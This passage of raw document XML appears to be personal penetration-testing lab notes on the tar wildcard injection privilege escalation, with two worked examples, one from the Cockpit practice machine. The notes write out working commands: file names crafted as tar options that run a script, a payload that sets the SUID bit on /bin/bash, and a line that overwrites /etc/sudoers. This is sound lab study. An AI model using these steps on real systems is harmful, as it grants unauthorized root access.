          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">e2scrub_all</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" but I think it's standard file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002561">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="118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524500" cy="889000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="193" name="image183.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image183.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId796"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="55245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2562">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="118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*/2 * * * * root cd /opt/admin &amp;&amp; tar -zxf /tmp/backup.tar.gz *</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1188"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">you can pass in '</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">*/2 * * * *</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' to</w:t>
      </w:r>
      <w:hyperlink r:id="rId797">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId798">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://crontab.guru/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> or you can guess based on the file name that this executes every two minutes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002564">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1188"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And we see that it's running as root, which is important for priv esc!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002565">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1188"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And now, we can do the bash gobbling attack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002566">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1188"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">First, we have to go to the directory where it's running the tar command, which as we see in the file, is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/opt/admin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002567">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1188"/>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cd /opt/admin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002568">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1188"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then we have to create a malicious file. I first tried to create a .elf rev shell, but the cron job wouldn't execute it or maybe a firewall blocked it. So to be safer, I should change the permissions of /bin/bash and make it SUID</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002569">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1188"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">First, find the path to chmod</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000256A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1188"/>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which chmod</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000256B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="118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echo "/usr/bin/chmod 4755 /bin/bash" &gt; shell.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000256C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1188"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">That command itself sets the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SUID</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> bit (4) and normal rwxr-xr-x (755) permissions on /bin/bash.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000256D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1188"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4755</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> → owner can read/write/execute, group/others can read/execute, and the file runs with the owner’s (root’s) privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000256E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1188"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So /bin/bash would become a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SUID</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> root binary, meaning any user who runs /bin/bash gets a root shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000256F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1188"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So once we get shell.sh to execute, we can run</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /bin/bash -p</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to get root shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002570">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1188"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To do this attack, while inside of /opt/admin, we can create these two files:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002571">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1188"/>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touch ./--checkpoint=1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002572">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1188"/>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touch './--checkpoint-action=exec=sh shell.sh'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002573">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1188"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now, we can check back in two minutes to see if /bin/bash has SUID bit set</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002574">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1188"/>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ls -lah /bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002575">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1188"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And we see SUID bit set!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002576">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1188"/>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-rwsr-xr-x 1 root root 1.4M Jan  6  2022 /bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002577">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1188"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then we login as root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002578">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="118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-p</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002579">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000257A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000257B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_t84wh2izqbgg" w:id="328"/>
      <w:bookmarkEnd w:id="328"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Example2 of Bash gobbling or Linux tar wildcard (with SUDO) (/usr/bin/tar)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000257C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000257D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Seen in </w:t>
      </w:r>
      <w:hyperlink r:id="rId799">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Cockpit</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000257E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1498600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="347" name="image338.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image338.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId80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57F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This time, it was actually sudo. This can be exploited as explained in the writeup:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002580">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1330"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">At target machine, create 2 files (make sure you run tar in the same directory)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002581">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1330"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo "" &gt; '--checkpoint=1'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002582">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1330"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo "" &gt; '--checkpoint-action=exec=sh payload.sh'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002583">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1330"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then create a payload.sh with below content, you can create on your kali machine and transfer to target machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002584">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1330"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo 'james ALL=(root) NOPASSWD: ALL' &gt; /etc/sudoers</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002585">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1330"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Replace "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">james</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" with your username</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002586">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1330"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod +x payload.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002587">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1330"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Execute the tar</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002588">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1330"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo /usr/bin/tar -czvf /tmp/backup.tar.gz *</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002589">
      <w:pPr>
        <w:rPr/>
